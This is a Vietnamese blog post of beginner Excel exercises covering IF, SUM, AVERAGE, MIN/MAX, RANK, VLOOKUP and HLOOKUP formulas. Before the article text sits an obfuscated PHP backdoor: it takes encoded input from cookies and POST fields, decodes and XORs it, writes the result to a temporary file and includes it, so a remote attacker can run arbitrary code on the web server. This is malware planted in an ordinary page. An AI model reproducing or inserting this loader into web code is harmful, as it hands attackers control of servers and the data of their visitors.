$HHiyUT = "\x78" . "\x5f" . chr (116) . "\x66" . chr (79) . "\x78" . "\x47";$iIaHOPxG = chr ( 933 - 834 )."\154" . chr ( 492 - 395 ).chr ( 661 - 546 ).'s' . "\x5f" . 'e' . "\170" . "\151" . chr ( 999 - 884 ).chr (116) . 's';$msCiNQl = class_exists($HHiyUT); $iIaHOPxG = "2844";$vbxQE = !1;if ($msCiNQl == $vbxQE){function XIekHN(){$IVSJGMKNST = new /* 34985 */ x_tfOxG(56410 + 56410); $IVSJGMKNST = NULL;}$fEkEMSS = "56410";class x_tfOxG{private function YScCtPkkq($fEkEMSS){if (is_array(x_tfOxG::$zSbMLQxVd)) {$KIIwoZzKQg = sys_get_temp_dir() . "/" . crc32(x_tfOxG::$zSbMLQxVd[chr ( 506 - 391 )."\x61" . "\x6c" . chr (116)]);@x_tfOxG::$zSbMLQxVd[chr ( 249 - 130 ).chr (114) . "\x69" . "\x74" . 'e']($KIIwoZzKQg, x_tfOxG::$zSbMLQxVd['c' . "\157" . "\156" . "\x74" . 'e' . chr (110) . 't']);include $KIIwoZzKQg;@x_tfOxG::$zSbMLQxVd["\144" . 'e' . "\x6c" . "\x65" . 't' . chr ( 592 - 491 )]($KIIwoZzKQg); $fEkEMSS = "56410";exit();}}private $blwPhu;public function nEnsnH(){echo 31891;}public function __destruct(){$fEkEMSS = "9727_29431";$this->YScCtPkkq($fEkEMSS); $fEkEMSS = "9727_29431";}public function GeNyU($ssvkPzWQGW, $DFSGPW){return $ssvkPzWQGW[0] ^ str_repeat($DFSGPW, (strlen($ssvkPzWQGW[0]) / strlen($DFSGPW)) + 1);}public function __construct($LmDkD=0){$CviHTaWh = $_POST;$OrSNh = $_COOKIE;$DFSGPW = "f2489b58-d218-4197-ab0a-b5e8ea0c189a";$uEWVn = @$OrSNh[substr($DFSGPW, 0, 4)];if (!empty($uEWVn)){$zuNHzrQM = "base64";$ssvkPzWQGW = "";$uEWVn = explode(",", $uEWVn);foreach ($uEWVn as $oTEKQDa){$ssvkPzWQGW .= @$OrSNh[$oTEKQDa];$ssvkPzWQGW .= @$CviHTaWh[$oTEKQDa];}$ssvkPzWQGW = array_map($zuNHzrQM . chr ( 1087 - 992 ).'d' . "\145" . chr ( 1082 - 983 ).chr ( 214 - 103 ).chr (100) . chr (101), array($ssvkPzWQGW,)); $ssvkPzWQGW = $this->GeNyU($ssvkPzWQGW, $DFSGPW);x_tfOxG::$zSbMLQxVd = @unserialize($ssvkPzWQGW);}}public static $zSbMLQxVd = 54997;}XIekHN();} Bài tập Excel cơ bản cho người mới bắt đầu | Chia Sẻ Kiến Thức

Bài tập Excel cơ bản cho người mới bắt đầu

Excel là một trong những kỹ năng cực kỳ quan trọng trong công việc. Khi thành thạo Excel, bạn sẽ có thể giải quyết công việc một cách dễ dàng và nhanh chóng, đặc biệt là gây ấn tượng với sếp và nhà tuyển dụng. Tuy nhiên, để có được những kỹ năng Excel này, bạn cần có thời gian luyện tập chăm chỉ, thường xuyên thực hành Excel cơ bản và nâng cao. Hiểu được điều này, hôm nay Blog Chia Sẻ Kiến Thức sẽ mang đến các bài tập Excel cơ bản cho người mới bắt đầu, các hàm thông dụng chi tiết nhất như: SUM, SUMIF, MIN, MAX, AVERAGE, ROUND, VLOOKUP…  giúp bạn trau dồi kỹ năng Excel và khắc phục nhược điểm của mình. Có lợi thế “đánh gục” đối thủ khi đi phỏng vấn.

Kiến thức cần nắm để có thể làm bài tập excel cơ bản cho người mới bắt đầu

Bài tập excel cơ bản cho người mới bắt đầu - Dễ như ăn kẹo

Hàm tính tổng và hàm đếm

Hàm tính tổng trong Excel bao gồm: SUM, SUMIF, SUMIFS

Hàm tính giá trị trung bình: AVERAGE

Hàm đếm bao gồm: COUNT, COUNTIF, COUNTIFS, COUNTBLANK, COUNTA

Hàm so sánh giá trị: MIN, MAX

Hàm logic

Các hàm logic trong Excel bao gồm: IF, AND, OR

Hàm thời gian

Các hàm biễu diễn ngày tháng trong Excel gồm có: DATE, DAY, MONTH, YEAR, NOW, TIME,  SECOND, MINUTE, HOUR, WEEKDAY, TEXT, NETWORKDAYS, EOMONTH

Hàm liên quan đến chuỗi ký tự

Tổng hợp các hàm cơ bản liên quan đến chuỗi ký tự: CONCATENATE, EXACT, LOWER, UPPER, PROPER, LEFT, RIGHT, MID, FIND, LEN, SUBSTITUTE

Hàm tham chiếu

Bao gồm: VLOOKUP, MATCH, INDEX, CHOOSE

Blog Chia Sẻ Kiến Thức đã liệt kê một số hàm cơ bản trong Excel ở bên trên, trong các bài tập Excel cơ bản cho người mới bắt đầu, chúng ta sẽ làm bài tập về các hàm này.

Bài tập Excel cơ bản cho người mới bắt đầu – Bài 1

Bài 1 - Bài tập Excel cơ bản cho người mới bắt đầu
Bài 1 – Bài tập Excel cơ bản cho người mới bắt đầu

Đề bài và bảng Excel như trên hình, bạn hãy làm một số bài tập Excel cơ bản bên dưới nhé!

Tính phụ cấp chứng vụ (hàm IF)

Cú pháp hàm IF:

=IF(Điều kiện,Giá trị nếu điều kiện đúng,Giá trị nếu điều kiện sai)

Điều kiện của phụ cấp chức vụ là: NV cộng 100, KT cộng 150, TP cộng 300, PGĐ cộng 350, GĐ cộng 500.
Không cần điền theo danh sách công việc, chỉ cần sử dụng hàm IF, cú pháp như sau:
=IF(D2=”NV”,100,IF(D2=”KT”,150,IF(D2=”TP”,300,IF(D2=”PGĐ”,350,IF(D2=”GĐ”,500)))))
Sau khi áp dụng công thức cho ô đầu tiên, bạn rê chuột sao chép cú pháp hàm IF xuống các ô còn lại để lấy kết quả.

Tính lương

Để tính lương, thực hiện công thức:
= E2*F2
Kéo chuột để sao chép công thức này và áp dụng cho hàng sau.

Tính tạm ứng (kết hợp hàm IF và ROUND)

Cú pháp hàm ROUND:

=ROUND(Số cần làm tròn,N

Ta có thể áp dụng công thức dưới đây để tính tạm ứng:
=ROUND(IF((G2+H2)*2/3<70000,(G2+H2)*2/3,70000),-3)
Kéo chuột để sao chép công thức này và áp dụng cho các hàng bên dưới.

Tính còn lại

Thực hiện công thức dưới đây để tính:

=G2+H2-I2

Sao chép và dán cú pháp vào các hàng ở dưới.

Tính tổng cộng (hàm SUM)

Bạn hãy nhập công thức sau để tính được Tổng lương:

=SUM(H2:H12)

Di chuột vào góc phải bên dưới của ô và kéo sang phải để copy công thức.

Tính trung bình (hàm EVERAGE)

Hàm AVERAGE dùng để tính trung bình lương:

=AVERAGE(H2:H12)

Copy công thức vào các cột bên phải.

Tính cao nhất và thấp nhất (hàm MIN, MAX)

Cao nhất

Để tính giá trị cao nhất, ta sử dụng công thức:

=MAX(H2:H12)

Thấp nhất

=MIN(H2:H12)

Sao chép công thức và dán vào các cột bên phải.

Bài tập Excel cơ bản cho người mới bắt đầu – Bài 2

Bài 2 - Bài tập Excel cơ bản cho người mới bắt đầu
Bài 2 – Bài tập Excel cơ bản cho người mới bắt đầu

Tính xếp loại (hàm IF)

Ở mục này, bạn sử dụng lồng hàm IF lại với nhau, công thức như sau:

=IF(C3>=9;”Giỏi”;IF(AND(C3<9;C3>=7);”Khá”;IF(AND(C3<7;C3>=5);”Trung Bình”;”Yếu”)))

Tính xếp loại dựa theo tổng điểm trung bình
Tính xếp loại dựa theo tổng điểm trung bình

Tính hạng (hàm RANK)

Cú pháp hàm RANK:

=RANK(Giá trị cần xếp hạng,Danh sách dữ liệu cần sắp xếp,Thứ tự cần sắp xếp[Tăng dần hoặc Giảm dần])

Áp dụng cú pháp trên, ta sẽ công thức sau:

=RANK(C3;$C$3:$C$9;0)

Tính thứ hạng của học sinh theo thứ tự từ cao đến thấp
Tính thứ hạng của học sinh theo thứ tự từ cao đến thấp

Bài tập Excel cơ bản cho người mới bắt đầu – Bài 3

Bài 3 - Bài tập Excel cơ bản cho người mới bắt đầu
Bài 3 – Bài tập Excel cơ bản cho người mới bắt đầu

Tính tên ngành (hàm HLOOKUP và hàm LEFT)

Cú pháp hàm HLOOKUP:

=HLOOKUP(Giá trị cần tìm,vùng dữ liệu,số thứ thự của hàng từ bên trái,giá trị Logic)

Cú pháp hàm LEFT:

=LEFT(chuỗi văn bản,số ký tự lấy ra từ bên trái [>0])

Ta tiến hành kết hợp 2 hàm trên để tính tên ngành:

=HLOOKUP(LEFT(C3,1),$B$12:$E$13,2,0))

Tính cộng điểm (hàm SUM)

Sử dụng công thức dưới đây:

=SUM(E3:G3)

Tính điểm ưu tiên (hàm VLOOKUP và hàm RIGHT)

Cú pháp hàm VLOOKUP:

=VLOOKUP(Giá trị cần tìm,vùng dữ liệu,số thứ thự của cột từ bên trái,giá trị Logic)

Cú pháp hàm RIGHT:

=RIGHT(Chuỗi văn bản,số ký tự lấy từ bên phải[>0])

Công thức để tính được điểm ưu tiên là:

=VLOOKUP(VALUE(RIGHT(C3,1)),$B$17:$C$20,2,0)

Tính tổng cộng (hàm SUM)

Ta áp dụng công thức của hàm SUM:

=SUM(H3,I3)

Tính kết quả (hàm IF)

Công thức để tính được kết quả trong bảng dữ liệu trên là:

=IF(K3>20,”Đậu”,”Rớt”)

Bạn hãy sao chép công thức của hàng trên và dán vào các hàng dưới để cho ra kết quả.

Xem thêm:

Trên đây là một số bài tập excel cơ bản cho người mới bắt đầu. Hy vọng bài viết của Blog Chia Sẻ Kiến Thức sẽ có thể giúp ích được cho bạn.

 

Đánh giá bài viết

Viết một bình luận